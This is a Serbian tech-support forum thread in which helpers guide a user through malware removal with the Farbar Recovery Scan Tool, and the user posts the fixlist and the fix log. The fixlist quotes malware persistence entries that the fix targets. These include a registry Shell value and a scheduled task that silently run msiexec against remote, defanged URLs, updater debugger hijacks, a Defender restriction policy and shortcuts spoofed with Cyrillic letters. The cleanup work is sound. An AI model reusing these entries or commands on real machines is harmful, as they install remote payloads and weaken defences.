HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:


U okviru Notepad-a klikni na File --> Save As
Pod Encoding izaberi Unicode.
Fajl nazovi Fixlist i sačuvaj na Desktop
Dvoklikom ponovo pokreni FRST.exe
Klikni na Fix i sačekaj dok program ne završi.
Ukoliko program zatraži restart računara, omogući mu da to nesmetano obavi.
Nakon završetka rada, otvoriće se fixlog.txt, sa sadržajem koji treba da kopiraš u temu.
Takođe, na Desktop-u će se nalaziti (fixlog.txt).

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Posle odrađenog postupka komp nema internet i ne mogu da zakačim FIXLIST.

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Pozdrav,
molim te da detaljnije opišeš taj problem s internetom.

Također, odradi ovo:

Otvori Command Prompt i upiši komandu:

ping 8.8.8.8

Uslikaj rezultate pokretanja komande ili napiši da li si dobio rezultat sličan kao na slici dole?


offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Povratio se internet .Odradio sam sve po porceduri.


CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10622
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Postavio si fixlist.txt, a ne fixlog.txt.

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Uh izvinjavam se.


Fix result of Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Ran by dejan (23-08-2017 23:20:44) Run:2
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
C:\ProgramData\BIT
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
C:\WINDOWS\System32\drivers\cryptfd.sys
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
C:\WINDOWS\System32\DRIVERS\lnvguard.sys
C:\Users\dejan\k350n_.reg
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: -> <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
C:\Program Files\Steerwardpriboly Builder
C:\Users\dejan\AppData\Roaming\Browsers
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{C7433376-6A29-4A5B-BC90-11A8C7EB83B9}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{A658861D-CBA9-4ABF-B92A-DA7911FBB27B}] => (Allow) C:\Program Files\Popcorn Time\PopcornTimeDesktop.exe
FirewallRules: [{766897D0-3B5A-4C85-B391-F14DBDFE6444}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
FirewallRules: [{6027F5AB-9B90-413A-BD09-10043CD649E1}] => (Allow) C:\Program Files\Popcorn Time\chromecast\node.exe
EmptyTemp:
*****************

Error: (0) Failed to create a restore point.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => key not found.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value not found.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\9xihyc2u => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 9xihyc2u => not found.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key not found.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{D53A7C8A-0595-11E7-85F9-64006A5CFC35} => value not found.
HKLM\Software\Classes\CLSID\{D53A7C8A-0595-11E7-85F9-64006A5CFC35} => key not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully.
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect => key removed successfully.
C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => not found
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => key removed successfully.
HKLM\System\CurrentControlSet\Services\BIT => key removed successfully.
BIT => service removed successfully.
"C:\ProgramData\BIT" => not found.
cryptfd => Unable to stop service.
HKLM\System\CurrentControlSet\Services\cryptfd => key removed successfully.
cryptfd => service removed successfully.
C:\WINDOWS\System32\drivers\cryptfd.sys => moved successfully

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10622
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Hajd ovako.

Zapakuj folder C:\FRST\Logs u arhivu i prikači ga uz poruku.

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

https://www.mycity.rs/must-login.png

offline
  • Pridružio: 14 Jun 2016
  • Poruke: 535

Daj mi nove FRST izveštaje. Pazi da Addition.txt bude označen.

Ko je trenutno na forumu
 

Ukupno su 1063 korisnika na forumu :: 37 registrovanih, 4 sakrivenih i 1022 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Petar, A.R.Chafee.Jr., AleksSE, Andrija357, Arahne, Asparagus, bokisha253, Brana01, Cassius Clay, comi_pfc, cvrle312, draganca, Duh sa sekirom, FOX, hologram, JOntra, Kriglord, Kruger, Leonov, lord sir giga, Luka Blažević, maCvele, Magistar78, Marko Marković, Milos ZA, Milos82, Misirac, nebkv, NoOneEver Dreams, Outis, procesor, raptorsi, suton, VJ, Vlada78, wolf431, Zerajic